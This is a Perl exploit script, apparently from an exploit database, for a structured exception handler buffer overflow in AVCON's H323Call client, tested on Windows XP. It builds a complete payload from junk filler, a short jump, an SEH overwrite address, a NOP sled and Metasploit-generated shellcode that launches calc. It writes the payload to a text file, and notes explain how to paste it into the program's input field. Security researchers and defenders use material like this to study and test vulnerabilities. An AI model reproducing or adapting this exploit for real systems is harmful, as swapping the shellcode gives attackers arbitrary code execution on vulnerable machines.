#!/usr/bin/perl

# Exploit Title: AVCON H323Call Buffer Overflow
# Date: 5/9/10
# Author: Dillon Beresford 
# URL: http://www.avcon.com.cn/ 
# Versions: 4.6.8.7 | 4.6.4.0
# Tested on: XP SP2 and SP3
# CVE : NONE 
# Code : exploit.pl 
# Twitter: http://twitter.com/D1N
# Download: http://meeting.bjhr.gov.cn/avcon/avcon.exe
# Download: http://meeting.cei.gov.cn/avcon/avcon.exe

my $exploit = "poc.txt";

## EDB Test Notes:
## Software can be installed as English.  Once installed, go to "Start" -> "AVCON4" -> select H323 Call
## or just run "H323Call.exe" located inside installation folder, 
## copy and paste the exploit (string) to the input field (there's only one),
## and click on "call". (this is a different flaw in the software package affects H323Call).

my $junk = "x41" x 1019;
my $nSEH = "xebx08x90x90"; 
my $SEH = pack('V',0x1005FE29);
my $nops = "x90" x 25;
# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
my $buf =
"x6ax31x59xd9xeexd9x74x24xf4x5bx81x73x13xc4" .
"xd2xe5x7bx83xebxfcxe2xf4x38x3ax6cx7bxc4xd2" .
"x85xf2x21xe3x37x1fx4fx80xd5xf0x96xdex6ex29" .
"xd0x59x97x53xcbx65xafx5dxf5x2dxd4xbbx68xee" .
"x84x07xc6xfexc5xbax0bxdfxe4xbcx26x22xb7x2c" .
"x4fx80xf5xf0x86xeexe4xabx4fx92x9dxfex04xa6" .
"xafx7ax14x82x6ex33xdcx59xbdx5bxc5x01x06x47" .
"x8dx59xd1xf0xc5x04xd4x84xf5x12x49xbax0bxdf" .
"xe4xbcxfcx32x90x8fxc7xafx1dx40xb9xf6x90x99" .
"x9cx59xbdx5fxc5x01x83xf0xc8x99x6ex23xd8xd3" .
"x36xf0xc0x59xe4xabx4dx96xc1x5fx9fx89x84x22" .
"x9ex83x1ax9bx9cx8dxbfxf0xd6x39x63x26xaexd3" .
"x68xfex7dxd2xe5x7bx94xbaxd4xf0xabx55x1axae" .
"x7fx2cxebx49x2exbax43xeex79x4fx1axaexf8xd4" .
"x99x71x44x29x05x0exc1x69xa2x68xb6xbdx8fx7b" .
"x97x2dx30x18xa5xbex86x7b";
my $padding = "E" x 5000;
my $payload = $junk.$nSEH.$SEH.$nops.$buf.$padding;

open (myfile,">$exploit");
print myfile $payload;
close (myfile);